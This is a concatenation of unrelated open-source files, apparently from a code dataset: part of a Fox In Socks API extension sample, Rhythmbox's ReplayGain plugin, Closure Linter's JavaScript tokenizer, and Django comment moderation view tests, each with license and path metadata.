def show(self, req, resp_obj, id): #NOTE: This only handles JSON responses. # You can use content type header to test for XML. resp_obj.obj['big_bands'] = 'Pig Bands!' 
class Foxinsocks(extensions.ExtensionDescriptor): """The Fox In Socks Extension""" name = "Fox In Socks" alias = "FOXNSOX" namespace = "http://www.fox.in.socks/api/ext/pie/v1.0" updated = "2011-01-22T13:25:27-06:00" def __init__(self, ext_mgr): ext_mgr.register(self) def get_resources(self): resources = [] resource = extensions.ResourceExtension('foxnsocks', FoxInSocksController()) resources.append(resource) return resources def get_controller_extensions(self): extension_list = [] extension_set = [ (FoxInSocksServerControllerExtension, 'servers'), (FoxInSocksFlavorGooseControllerExtension, 'flavors'), (FoxInSocksFlavorBandsControllerExtension, 'flavors'), ] for klass, collection in extension_set: controller = klass() ext = extensions.ControllerExtension(self, collection, controller) extension_list.append(ext) return extension_list
apache-2.0
mssurajkaiga/rhythmbox
plugins/replaygain/player.py
1
8117
# -*- Mode: python; coding: utf-8; tab-width: 8; indent-tabs-mode: t; -*- # # Copyright (C) 2010 Jonathan Matthew # # This program is free software; you can redistribute it and/or modify # it under the terms of the GNU General Public License as published by # the Free Software Foundation; either version 2, or (at your option) # any later version. # # The Rhythmbox authors hereby grant permission for non-GPL compatible # GStreamer plugins to be used and distributed together with GStreamer # and Rhythmbox. This permission is above and beyond the permissions granted # by the GPL license by which Rhythmbox is covered. If you modify this code # you may extend this exception to your version of the code, but you are not # obligated to do so. If you do not wish to do so, delete this exception # statement from your version. # # This program is distributed in the hope that it will be useful, # but WITHOUT ANY WARRANTY; without even the implied warranty of # MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the # GNU General Public License for more details. # # You should have received a copy of the GNU General Public License # along with this program; if not, write to the Free Software # Foundation, Inc., 51 Franklin St, Fifth Floor, Boston, MA 02110-1301 USA. # import rb import gi gi.require_version("Gst", "0.11") from gi.repository import RB from gi.repository import GObject, Gio, Gst import config import gettext gettext.install('rhythmbox', RB.locale_dir()) EPSILON = 0.001 class ReplayGainPlayer(object): def __init__(self, shell): # make sure the replaygain elements are available missing = [] required = ("rgvolume", "rglimiter") for e in required: if Gst.ElementFactory.find(e) is None: missing.append(e) if len(missing) > 0: msg = _("The GStreamer elements required for ReplayGain processing are not available. 
The missing elements are: %s") % ", ".join(missing) RB.error_dialog(shell.props.window, _("ReplayGain GStreamer plugins not available"), msg) raise Exception(msg) self.shell_player = shell.props.shell_player self.player = self.shell_player.props.player self.settings = Gio.Settings("org.gnome.rhythmbox.plugins.replaygain") self.settings.connect("changed::limiter", self.limiter_changed_cb) self.previous_gain = [] self.fallback_gain = 0.0 self.resetting_rgvolume = False # we use different means to hook into the playback pipeline depending on # the playback backend in use if GObject.signal_lookup("get-stream-filters", self.player): self.setup_xfade_mode() self.deactivate_backend = self.deactivate_xfade_mode else: self.setup_playbin_mode() self.deactivate_backend = self.deactivate_playbin_mode def deactivate(self): self.deactivate_backend() self.player = None self.shell_player = None def set_rgvolume(self, rgvolume): # set preamp level preamp = self.settings['preamp'] rgvolume.props.pre_amp = preamp # set mode # there may eventually be a 'guess' mode here that tries to figure out # what to do based on the upcoming tracks mode = self.settings['mode'] if mode == config.REPLAYGAIN_MODE_ALBUM: rgvolume.props.album_mode = 1 else: rgvolume.props.album_mode = 0 # set calculated fallback gain rgvolume.props.fallback_gain = self.fallback_gain print "updated rgvolume settings: preamp %f, album-mode %s, fallback gain %f" % ( rgvolume.props.pre_amp, str(rgvolume.props.album_mode), rgvolume.props.fallback_gain) def update_fallback_gain(self, rgvolume): gain = rgvolume.props.target_gain - rgvolume.props.pre_amp # filter out bogus notifications if abs(gain - self.fallback_gain) < EPSILON: print "ignoring gain %f (current fallback gain)" % gain return False if abs(gain) < EPSILON: print "ignoring zero gain (pretty unlikely)" return False # update the running average if len(self.previous_gain) == config.AVERAGE_GAIN_SAMPLES: self.previous_gain.pop(0) self.previous_gain.append(gain) 
self.fallback_gain = sum(self.previous_gain) / len(self.previous_gain) print "got target gain %f; running average of previous gain values is %f" % (gain, self.fallback_gain) return True ### playbin mode (rgvolume ! rglimiter as global filter) def playbin_uri_notify_cb(self, playbin, pspec): self.got_replaygain = False def playbin_notify_cb(self, player, pspec): playbin = player.props.playbin playbin.connect("notify::uri", self.playbin_uri_notify_cb) def playbin_target_gain_cb(self, rgvolume, pspec): #if self.resetting_rgvolume is True: # return if self.update_fallback_gain(rgvolume) == True: self.got_replaygain = True # do something clever probably def rgvolume_reset_done(self, pad, blocked, rgvolume): print "rgvolume reset done" self.set_rgvolume(rgvolume) def rgvolume_blocked_cb(self, pad, blocked, rgvolume): print "bouncing rgvolume state to reset tags" # somehow need to decide whether we've already got a gain value for the new track #self.resetting_rgvolume = True rgvolume.set_state(Gst.State.READY) rgvolume.set_state(Gst.State.PLAYING) #self.resetting_rgvolume = False pad.set_blocked_async(False, self.rgvolume_reset_done, rgvolume) def playing_entry_changed(self, player, entry): if entry is None: return if self.got_replaygain is False: print "blocking rgvolume to reset it" pad = self.rgvolume.get_static_pad("sink").get_peer() pad.set_blocked_async(True, self.rgvolume_blocked_cb, self.rgvolume) else: print "no need to reset rgvolume" def setup_playbin_mode(self): print "using output filter for rgvolume and rglimiter" self.rgvolume = Gst.ElementFactory.make("rgvolume", None) self.rgvolume.connect("notify::target-gain", self.playbin_target_gain_cb) self.rglimiter = Gst.ElementFactory.make("rglimiter", None) # on track changes, we need to reset the rgvolume state, otherwise it # carries over the tags from the previous track self.pec_id = self.shell_player.connect('playing-song-changed', self.playing_entry_changed) # watch playbin's uri property to see when a new 
track is opened playbin = self.player.props.playbin if playbin is None: self.player.connect("notify::playbin", self.playbin_notify_cb) else: playbin.connect("notify::uri", self.playbin_uri_notify_cb) # work around bug #621632 by adding these as separate filters # XXX try not doing this with 0.11 once filters exist again self.player.add_filter(self.rgvolume) self.player.add_filter(self.rglimiter) self.rgfilter = None def deactivate_playbin_mode(self): if self.rgfilter == None: self.player.remove_filter(self.rglimiter) self.player.remove_filter(self.rgvolume) else: self.player.remove_filter(self.rgfilter) self.rgfilter = None self.shell_player.disconnect(self.pec_id) self.pec_id = None ### xfade mode (rgvolume as stream filter, rglimiter as global filter) def xfade_target_gain_cb(self, rgvolume, pspec): if self.update_fallback_gain(rgvolume) is True: # we don't want any further notifications from this stream rgvolume.disconnect_by_func(self.xfade_target_gain_cb) def create_stream_filter_cb(self, player, uri): print "creating rgvolume instance for stream %s" % uri rgvolume = Gst.ElementFactory.make("rgvolume", None) rgvolume.connect("notify::target-gain", self.xfade_target_gain_cb) self.set_rgvolume(rgvolume) return [rgvolume] def limiter_changed_cb(self, settings, key): if self.rglimiter is not None: limiter = settings['limiter'] print "limiter setting is now %s" % str(limiter) self.rglimiter.props.enabled = limiter def setup_xfade_mode(self): print "using per-stream filter for rgvolume" self.stream_filter_id = self.player.connect("get-stream-filters", self.create_stream_filter_cb) # and add rglimiter as an output filter self.rglimiter = Gst.ElementFactory.make("rglimiter", None) self.player.add_filter(self.rglimiter) def deactivate_xfade_mode(self): self.player.disconnect(self.stream_filter_id) self.stream_filter_id = None self.player.remove_filter(self.rglimiter) self.rglimiter = None
gpl-2.0
asankah/closure-linter
closure_linter/javascripttokenizer.py
1
16385
#!/usr/bin/env python # # Copyright 2007 The Closure Linter Authors. All Rights Reserved. # # Licensed under the Apache License, Version 2.0 (the "License"); # you may not use this file except in compliance with the License. # You may obtain a copy of the License at # # http://www.apache.org/licenses/LICENSE-2.0 # # Unless required by applicable law or agreed to in writing, software # distributed under the License is distributed on an "AS-IS" BASIS, # WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. # See the License for the specific language governing permissions and # limitations under the License. """Regular expression based JavaScript parsing classes.""" __author__ = ('robbyw@google.com (Robert Walker)', 'ajp@google.com (Andy Perelson)') import copy import re from closure_linter import javascripttokens from closure_linter.common import matcher from closure_linter.common import tokenizer # Shorthand Type = javascripttokens.JavaScriptTokenType Matcher = matcher.Matcher class JavaScriptModes(object): """Enumeration of the different matcher modes used for JavaScript.""" TEXT_MODE = 'text' SINGLE_QUOTE_STRING_MODE = 'single_quote_string' DOUBLE_QUOTE_STRING_MODE = 'double_quote_string' BLOCK_COMMENT_MODE = 'block_comment' DOC_COMMENT_MODE = 'doc_comment' DOC_COMMENT_LEX_SPACES_MODE = 'doc_comment_spaces' LINE_COMMENT_MODE = 'line_comment' PARAMETER_MODE = 'parameter' FUNCTION_MODE = 'function' class JavaScriptTokenizer(tokenizer.Tokenizer): """JavaScript tokenizer. Convert JavaScript code in to an array of tokens. """ # Useful patterns for JavaScript parsing. IDENTIFIER_CHAR = r'A-Za-z0-9_$.' # Number patterns based on: # http://www.mozilla.org/js/language/js20-2000-07/formal/lexer-grammar.html MANTISSA = r""" (\d+(?!\.)) | # Matches '10' (\d+\.(?!\d)) | # Matches '10.' (\d*\.\d+) # Matches '.5' or '10.5' """ DECIMAL_LITERAL = r'(%s)([eE][-+]?\d+)?' 
% MANTISSA HEX_LITERAL = r'0[xX][0-9a-fA-F]+' NUMBER = re.compile(r""" ((%s)|(%s)) """ % (HEX_LITERAL, DECIMAL_LITERAL), re.VERBOSE) # Strings come in three parts - first we match the start of the string, then # the contents, then the end. The contents consist of any character except a # backslash or end of string, or a backslash followed by any character, or a # backslash followed by end of line to support correct parsing of multi-line # strings. SINGLE_QUOTE = re.compile(r"'") SINGLE_QUOTE_TEXT = re.compile(r"([^'\\]|\\(.|$))+") DOUBLE_QUOTE = re.compile(r'"') DOUBLE_QUOTE_TEXT = re.compile(r'([^"\\]|\\(.|$))+') START_SINGLE_LINE_COMMENT = re.compile(r'//') END_OF_LINE_SINGLE_LINE_COMMENT = re.compile(r'//$') START_DOC_COMMENT = re.compile(r'/\*\*') START_BLOCK_COMMENT = re.compile(r'/\*') END_BLOCK_COMMENT = re.compile(r'\*/') BLOCK_COMMENT_TEXT = re.compile(r'([^*]|\*(?!/))+') # Comment text is anything that we are not going to parse into another special # token like (inline) flags or end comments. Complicated regex to match # most normal characters, and '*', '{', '}', and '@' when we are sure that # it is safe. Expression [^*{\s]@ must come first, or the other options will # match everything before @, and we won't match @'s that aren't part of flags # like in email addresses in the @author tag. DOC_COMMENT_TEXT = re.compile(r'([^*{}\s]@|[^*{}@]|\*(?!/))+') DOC_COMMENT_NO_SPACES_TEXT = re.compile(r'([^*{}\s]@|[^*{}@\s]|\*(?!/))+') # Match the prefix ' * ' that starts every line of jsdoc. Want to include # spaces after the '*', but nothing else that occurs after a '*', and don't # want to match the '*' in '*/'. 
DOC_PREFIX = re.compile(r'\s*\*(\s+|(?!/))') START_BLOCK = re.compile('{') END_BLOCK = re.compile('}') REGEX_CHARACTER_CLASS = r""" \[ # Opening bracket ([^\]\\]|\\.)* # Anything but a ] or \, # or a backslash followed by anything \] # Closing bracket """ # We ensure the regex is followed by one of the above tokens to avoid # incorrectly parsing something like x / y / z as x REGEX(/ y /) z POST_REGEX_LIST = [ ';', ',', r'\.', r'\)', r'\]', '$', r'\/\/', r'\/\*', ':', '}'] REGEX = re.compile(r""" / # opening slash (?!\*) # not the start of a comment (\\.|[^\[\/\\]|(%s))* # a backslash followed by anything, # or anything but a / or [ or \, # or a character class / # closing slash [gimsx]* # optional modifiers (?=\s*(%s)) """ % (REGEX_CHARACTER_CLASS, '|'.join(POST_REGEX_LIST)), re.VERBOSE) ANYTHING = re.compile(r'.*') PARAMETERS = re.compile(r'[^\)]+') CLOSING_PAREN_WITH_SPACE = re.compile(r'\)\s*') FUNCTION_DECLARATION = re.compile(r'\bfunction\b') OPENING_PAREN = re.compile(r'\(') CLOSING_PAREN = re.compile(r'\)') OPENING_BRACKET = re.compile(r'\[') CLOSING_BRACKET = re.compile(r'\]') # We omit these JS keywords from the list: # function - covered by FUNCTION_DECLARATION. # delete, in, instanceof, new, typeof - included as operators. # this - included in identifiers. # null, undefined - not included, should go in some "special constant" list. KEYWORD_LIST = ['break', 'case', 'catch', 'continue', 'default', 'do', 'else', 'finally', 'for', 'if', 'return', 'switch', 'throw', 'try', 'var', 'while', 'with'] # List of regular expressions to match as operators. Some notes: for our # purposes, the comma behaves similarly enough to a normal operator that we # include it here. r'\bin\b' actually matches 'in' surrounded by boundary # characters - this may not match some very esoteric uses of the in operator. # Operators that are subsets of larger operators must come later in this list # for proper matching, e.g., '>>' must come AFTER '>>>'. 
OPERATOR_LIST = [',', r'\+\+', '===', '!==', '>>>=', '>>>', '==', '>=', '<=', '!=', '<<=', '>>=', '<<', '>>', '>', '<', r'\+=', r'\+', '--', '\^=', '-=', '-', '/=', '/', r'\*=', r'\*', '%=', '%', '&&', r'\|\|', '&=', '&', r'\|=', r'\|', '=', '!', ':', '\?', r'\^', r'\bdelete\b', r'\bin\b', r'\binstanceof\b', r'\bnew\b', r'\btypeof\b', r'\bvoid\b'] OPERATOR = re.compile('|'.join(OPERATOR_LIST)) WHITESPACE = re.compile(r'\s+') SEMICOLON = re.compile(r';') # Technically JavaScript identifiers can't contain '.', but we treat a set of # nested identifiers as a single identifier. NESTED_IDENTIFIER = r'[a-zA-Z_$][%s.]*' % IDENTIFIER_CHAR IDENTIFIER = re.compile(NESTED_IDENTIFIER) SIMPLE_LVALUE = re.compile(r""" (?P<identifier>%s) # a valid identifier (?=\s* # optional whitespace \= # look ahead to equal sign (?!=)) # not follwed by equal """ % NESTED_IDENTIFIER, re.VERBOSE) # A doc flag is a @ sign followed by non-space characters that appears at the # beginning of the line, after whitespace, or after a '{'. The look-behind # check is necessary to not match someone@google.com as a flag. DOC_FLAG = re.compile(r'(^|(?<=\s))@(?P<name>[a-zA-Z]+)') # To properly parse parameter names, we need to tokenize whitespace into a # token. DOC_FLAG_LEX_SPACES = re.compile(r'(^|(?<=\s))@(?P<name>%s)\b' % '|'.join(['param'])) DOC_INLINE_FLAG = re.compile(r'(?<={)@(?P<name>[a-zA-Z]+)') # Star followed by non-slash, i.e a star that does not end a comment. # This is used for TYPE_GROUP below. SAFE_STAR = r'(\*(?!/))' COMMON_DOC_MATCHERS = [ # Find the end of the comment. Matcher(END_BLOCK_COMMENT, Type.END_DOC_COMMENT, JavaScriptModes.TEXT_MODE), # Tokenize documented flags like @private. Matcher(DOC_INLINE_FLAG, Type.DOC_INLINE_FLAG), Matcher(DOC_FLAG_LEX_SPACES, Type.DOC_FLAG, JavaScriptModes.DOC_COMMENT_LEX_SPACES_MODE), # Encountering a doc flag should leave lex spaces mode. Matcher(DOC_FLAG, Type.DOC_FLAG, JavaScriptModes.DOC_COMMENT_MODE), # Tokenize braces so we can find types. 
Matcher(START_BLOCK, Type.DOC_START_BRACE), Matcher(END_BLOCK, Type.DOC_END_BRACE), Matcher(DOC_PREFIX, Type.DOC_PREFIX, None, True)] # When text is not matched, it is given this default type based on mode. # If unspecified in this map, the default default is Type.NORMAL. JAVASCRIPT_DEFAULT_TYPES = { JavaScriptModes.DOC_COMMENT_MODE: Type.COMMENT, JavaScriptModes.DOC_COMMENT_LEX_SPACES_MODE: Type.COMMENT } @classmethod def BuildMatchers(cls): """Builds the token matcher group. The token matcher groups work as follows: it is a list of Matcher objects. The matchers will be tried in this order, and the first to match will be returned. Hence the order is important because the matchers that come first overrule the matchers that come later. Returns: The completed token matcher group. """ # Match a keyword string followed by a non-identifier character in order to # not match something like doSomething as do + Something. keyword = re.compile('(%s)((?=[^%s])|$)' % ( '|'.join(cls.KEYWORD_LIST), cls.IDENTIFIER_CHAR)) return { # Matchers for basic text mode. JavaScriptModes.TEXT_MODE: [ # Check a big group - strings, starting comments, and regexes - all # of which could be intertwined. 'string with /regex/', # /regex with 'string'/, /* comment with /regex/ and string */ (and # so on) Matcher(cls.START_DOC_COMMENT, Type.START_DOC_COMMENT, JavaScriptModes.DOC_COMMENT_MODE), Matcher(cls.START_BLOCK_COMMENT, Type.START_BLOCK_COMMENT, JavaScriptModes.BLOCK_COMMENT_MODE), Matcher(cls.END_OF_LINE_SINGLE_LINE_COMMENT, Type.START_SINGLE_LINE_COMMENT), Matcher(cls.START_SINGLE_LINE_COMMENT, Type.START_SINGLE_LINE_COMMENT, JavaScriptModes.LINE_COMMENT_MODE), Matcher(cls.SINGLE_QUOTE, Type.SINGLE_QUOTE_STRING_START, JavaScriptModes.SINGLE_QUOTE_STRING_MODE), Matcher(cls.DOUBLE_QUOTE, Type.DOUBLE_QUOTE_STRING_START, JavaScriptModes.DOUBLE_QUOTE_STRING_MODE), Matcher(cls.REGEX, Type.REGEX), # Next we check for start blocks appearing outside any of the items # above. 
Matcher(cls.START_BLOCK, Type.START_BLOCK), Matcher(cls.END_BLOCK, Type.END_BLOCK), # Then we search for function declarations. Matcher(cls.FUNCTION_DECLARATION, Type.FUNCTION_DECLARATION, JavaScriptModes.FUNCTION_MODE), # Next, we convert non-function related parens to tokens. Matcher(cls.OPENING_PAREN, Type.START_PAREN), Matcher(cls.CLOSING_PAREN, Type.END_PAREN), # Next, we convert brackets to tokens. Matcher(cls.OPENING_BRACKET, Type.START_BRACKET), Matcher(cls.CLOSING_BRACKET, Type.END_BRACKET), # Find numbers. This has to happen before operators because # scientific notation numbers can have + and - in them. Matcher(cls.NUMBER, Type.NUMBER), # Find operators and simple assignments Matcher(cls.SIMPLE_LVALUE, Type.SIMPLE_LVALUE), Matcher(cls.OPERATOR, Type.OPERATOR), # Find key words and whitespace. Matcher(keyword, Type.KEYWORD), Matcher(cls.WHITESPACE, Type.WHITESPACE), # Find identifiers. Matcher(cls.IDENTIFIER, Type.IDENTIFIER), # Finally, we convert semicolons to tokens. Matcher(cls.SEMICOLON, Type.SEMICOLON)], # Matchers for single quote strings. JavaScriptModes.SINGLE_QUOTE_STRING_MODE: [ Matcher(cls.SINGLE_QUOTE_TEXT, Type.STRING_TEXT), Matcher(cls.SINGLE_QUOTE, Type.SINGLE_QUOTE_STRING_END, JavaScriptModes.TEXT_MODE)], # Matchers for double quote strings. JavaScriptModes.DOUBLE_QUOTE_STRING_MODE: [ Matcher(cls.DOUBLE_QUOTE_TEXT, Type.STRING_TEXT), Matcher(cls.DOUBLE_QUOTE, Type.DOUBLE_QUOTE_STRING_END, JavaScriptModes.TEXT_MODE)], # Matchers for block comments. JavaScriptModes.BLOCK_COMMENT_MODE: [ # First we check for exiting a block comment. Matcher(cls.END_BLOCK_COMMENT, Type.END_BLOCK_COMMENT, JavaScriptModes.TEXT_MODE), # Match non-comment-ending text.. Matcher(cls.BLOCK_COMMENT_TEXT, Type.COMMENT)], # Matchers for doc comments. 
JavaScriptModes.DOC_COMMENT_MODE: cls.COMMON_DOC_MATCHERS + [ Matcher(cls.DOC_COMMENT_TEXT, Type.COMMENT)], JavaScriptModes.DOC_COMMENT_LEX_SPACES_MODE: cls.COMMON_DOC_MATCHERS + [ Matcher(cls.WHITESPACE, Type.COMMENT), Matcher(cls.DOC_COMMENT_NO_SPACES_TEXT, Type.COMMENT)], # Matchers for single line comments. JavaScriptModes.LINE_COMMENT_MODE: [ # We greedy match until the end of the line in line comment mode. Matcher(cls.ANYTHING, Type.COMMENT, JavaScriptModes.TEXT_MODE)], # Matchers for code after the function keyword. JavaScriptModes.FUNCTION_MODE: [ # Must match open paren before anything else and move into parameter # mode, otherwise everything inside the parameter list is parsed # incorrectly. Matcher(cls.OPENING_PAREN, Type.START_PARAMETERS, JavaScriptModes.PARAMETER_MODE), Matcher(cls.WHITESPACE, Type.WHITESPACE), Matcher(cls.IDENTIFIER, Type.FUNCTION_NAME)], # Matchers for function parameters JavaScriptModes.PARAMETER_MODE: [ # When in function parameter mode, a closing paren is treated # specially. Everything else is treated as lines of parameters. Matcher(cls.CLOSING_PAREN_WITH_SPACE, Type.END_PARAMETERS, JavaScriptModes.TEXT_MODE), Matcher(cls.PARAMETERS, Type.PARAMETERS, JavaScriptModes.PARAMETER_MODE)]} def __init__(self, parse_js_doc = True): """Create a tokenizer object. Args: parse_js_doc: Whether to do detailed parsing of javascript doc comments, or simply treat them as normal comments. Defaults to parsing JsDoc. """ matchers = self.BuildMatchers() if not parse_js_doc: # Make a copy so the original doesn't get modified. matchers = copy.deepcopy(matchers) matchers[JavaScriptModes.DOC_COMMENT_MODE] = matchers[ JavaScriptModes.BLOCK_COMMENT_MODE] tokenizer.Tokenizer.__init__(self, JavaScriptModes.TEXT_MODE, matchers, self.JAVASCRIPT_DEFAULT_TYPES) def _CreateToken(self, string, token_type, line, line_number, values=None): """Creates a new JavaScriptToken object. Args: string: The string of input the token contains. token_type: The type of token. 
line: The text of the line this token is in. line_number: The line number of the token. values: A dict of named values within the token. For instance, a function declaration may have a value called 'name' which captures the name of the function. """ return javascripttokens.JavaScriptToken(string, token_type, line, line_number, values, line_number)
apache-2.0
xq262144/hue
desktop/core/ext-py/Django-1.6.10/tests/comment_tests/tests/test_moderation_views.py
58
13414
from __future__ import absolute_import, unicode_literals from django.contrib.auth.models import User, Permission from django.contrib.comments import signals from django.contrib.comments.models import Comment, CommentFlag from django.contrib.contenttypes.models import ContentType from django.utils import translation from . import CommentTestCase class FlagViewTests(CommentTestCase): def testFlagGet(self): """GET the flag view: render a confirmation page.""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.get("/flag/%d/" % pk) self.assertTemplateUsed(response, "comments/flag.html") def testFlagPost(self): """POST the flag view: actually flag the view (nice for XHR)""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.post("/flag/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/flagged/?c=%d" % pk) c = Comment.objects.get(pk=pk) self.assertEqual(c.flags.filter(flag=CommentFlag.SUGGEST_REMOVAL).count(), 1) return c def testFlagPostNext(self): """ POST the flag view, explicitly providing a next url. """ comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.post("/flag/%d/" % pk, {'next': "/go/here/"}) self.assertEqual(response["Location"], "http://testserver/go/here/?c=%d" % pk) def testFlagPostUnsafeNext(self): """ POSTing to the flag view with an unsafe next url will ignore the provided url when redirecting. 
""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.post("/flag/%d/" % pk, {'next': "http://elsewhere/bad"}) self.assertEqual(response["Location"], "http://testserver/flagged/?c=%d" % pk) def testFlagPostTwice(self): """Users don't get to flag comments more than once.""" c = self.testFlagPost() self.client.post("/flag/%d/" % c.pk) self.client.post("/flag/%d/" % c.pk) self.assertEqual(c.flags.filter(flag=CommentFlag.SUGGEST_REMOVAL).count(), 1) def testFlagAnon(self): """GET/POST the flag view while not logged in: redirect to log in.""" comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/flag/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/flag/%d/" % pk) response = self.client.post("/flag/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/flag/%d/" % pk) def testFlaggedView(self): comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/flagged/", data={"c": pk}) self.assertTemplateUsed(response, "comments/flagged.html") def testFlagSignals(self): """Test signals emitted by the comment flag view""" # callback def receive(sender, **kwargs): self.assertEqual(kwargs['flag'].flag, CommentFlag.SUGGEST_REMOVAL) self.assertEqual(kwargs['request'].user.username, "normaluser") received_signals.append(kwargs.get('signal')) # Connect signals and keep track of handled ones received_signals = [] signals.comment_was_flagged.connect(receive) # Post a comment and check the signals self.testFlagPost() self.assertEqual(received_signals, [signals.comment_was_flagged]) signals.comment_was_flagged.disconnect(receive) def makeModerator(username): u = User.objects.get(username=username) ct = ContentType.objects.get_for_model(Comment) p = Permission.objects.get(content_type=ct, codename="can_moderate") u.user_permissions.add(p) class 
DeleteViewTests(CommentTestCase): def testDeletePermissions(self): """The delete view should only be accessible to 'moderators'""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.get("/delete/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/delete/%d/" % pk) makeModerator("normaluser") response = self.client.get("/delete/%d/" % pk) self.assertEqual(response.status_code, 200) def testDeletePost(self): """POSTing the delete view should mark the comment as removed""" comments = self.createSomeComments() pk = comments[0].pk makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/delete/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/deleted/?c=%d" % pk) c = Comment.objects.get(pk=pk) self.assertTrue(c.is_removed) self.assertEqual(c.flags.filter(flag=CommentFlag.MODERATOR_DELETION, user__username="normaluser").count(), 1) def testDeletePostNext(self): """ POSTing the delete view will redirect to an explicitly provided a next url. """ comments = self.createSomeComments() pk = comments[0].pk makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/delete/%d/" % pk, {'next': "/go/here/"}) self.assertEqual(response["Location"], "http://testserver/go/here/?c=%d" % pk) def testDeletePostUnsafeNext(self): """ POSTing to the delete view with an unsafe next url will ignore the provided url when redirecting. 
""" comments = self.createSomeComments() pk = comments[0].pk makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/delete/%d/" % pk, {'next': "http://elsewhere/bad"}) self.assertEqual(response["Location"], "http://testserver/deleted/?c=%d" % pk) def testDeleteSignals(self): def receive(sender, **kwargs): received_signals.append(kwargs.get('signal')) # Connect signals and keep track of handled ones received_signals = [] signals.comment_was_flagged.connect(receive) # Post a comment and check the signals self.testDeletePost() self.assertEqual(received_signals, [signals.comment_was_flagged]) signals.comment_was_flagged.disconnect(receive) def testDeletedView(self): comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/deleted/", data={"c": pk}) self.assertTemplateUsed(response, "comments/deleted.html") class ApproveViewTests(CommentTestCase): def testApprovePermissions(self): """The approve view should only be accessible to 'moderators'""" comments = self.createSomeComments() pk = comments[0].pk self.client.login(username="normaluser", password="normaluser") response = self.client.get("/approve/%d/" % pk) self.assertEqual(response["Location"], "http://testserver/accounts/login/?next=/approve/%d/" % pk) makeModerator("normaluser") response = self.client.get("/approve/%d/" % pk) self.assertEqual(response.status_code, 200) def testApprovePost(self): """POSTing the approve view should mark the comment as removed""" c1, c2, c3, c4 = self.createSomeComments() c1.is_public = False; c1.save() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/approve/%d/" % c1.pk) self.assertEqual(response["Location"], "http://testserver/approved/?c=%d" % c1.pk) c = Comment.objects.get(pk=c1.pk) self.assertTrue(c.is_public) self.assertEqual(c.flags.filter(flag=CommentFlag.MODERATOR_APPROVAL, 
user__username="normaluser").count(), 1) def testApprovePostNext(self): """ POSTing the approve view will redirect to an explicitly provided a next url. """ c1, c2, c3, c4 = self.createSomeComments() c1.is_public = False; c1.save() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/approve/%d/" % c1.pk, {'next': "/go/here/"}) self.assertEqual(response["Location"], "http://testserver/go/here/?c=%d" % c1.pk) def testApprovePostUnsafeNext(self): """ POSTing to the approve view with an unsafe next url will ignore the provided url when redirecting. """ c1, c2, c3, c4 = self.createSomeComments() c1.is_public = False; c1.save() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.post("/approve/%d/" % c1.pk, {'next': "http://elsewhere/bad"}) self.assertEqual(response["Location"], "http://testserver/approved/?c=%d" % c1.pk) def testApproveSignals(self): def receive(sender, **kwargs): received_signals.append(kwargs.get('signal')) # Connect signals and keep track of handled ones received_signals = [] signals.comment_was_flagged.connect(receive) # Post a comment and check the signals self.testApprovePost() self.assertEqual(received_signals, [signals.comment_was_flagged]) signals.comment_was_flagged.disconnect(receive) def testApprovedView(self): comments = self.createSomeComments() pk = comments[0].pk response = self.client.get("/approved/", data={"c":pk}) self.assertTemplateUsed(response, "comments/approved.html") class AdminActionsTests(CommentTestCase): urls = "comment_tests.urls_admin" def setUp(self): super(AdminActionsTests, self).setUp() # Make "normaluser" a moderator u = User.objects.get(username="normaluser") u.is_staff = True perms = Permission.objects.filter( content_type__app_label = 'comments', codename__endswith = 'comment' ) for perm in perms: u.user_permissions.add(perm) u.save() def testActionsNonModerator(self): comments = 
self.createSomeComments() self.client.login(username="normaluser", password="normaluser") response = self.client.get("/admin/comments/comment/") self.assertNotContains(response, "approve_comments") def testActionsModerator(self): comments = self.createSomeComments() makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") response = self.client.get("/admin/comments/comment/") self.assertContains(response, "approve_comments") def testActionsDisabledDelete(self): "Tests a CommentAdmin where 'delete_selected' has been disabled." comments = self.createSomeComments() self.client.login(username="normaluser", password="normaluser") response = self.client.get('/admin2/comments/comment/') self.assertEqual(response.status_code, 200) self.assertNotContains(response, '<option value="delete_selected">') def performActionAndCheckMessage(self, action, action_params, expected_message): response = self.client.post('/admin/comments/comment/', data={'_selected_action': action_params, 'action': action, 'index': 0}, follow=True) self.assertContains(response, expected_message) def testActionsMessageTranslations(self): c1, c2, c3, c4 = self.createSomeComments() one_comment = c1.pk many_comments = [c2.pk, c3.pk, c4.pk] makeModerator("normaluser") self.client.login(username="normaluser", password="normaluser") with translation.override('en'): #Test approving self.performActionAndCheckMessage('approve_comments', one_comment, '1 comment was successfully approved') self.performActionAndCheckMessage('approve_comments', many_comments, '3 comments were successfully approved') #Test flagging self.performActionAndCheckMessage('flag_comments', one_comment, '1 comment was successfully flagged') self.performActionAndCheckMessage('flag_comments', many_comments, '3 comments were successfully flagged') #Test removing self.performActionAndCheckMessage('remove_comments', one_comment, '1 comment was successfully removed') 
self.performActionAndCheckMessage('remove_comments', many_comments, '3 comments were successfully removed')
apache-2.0
sametmax/Django--an-app-at-a-time
ignore_this_directory/django/db/backends/sqlite3/base.py
3
22958
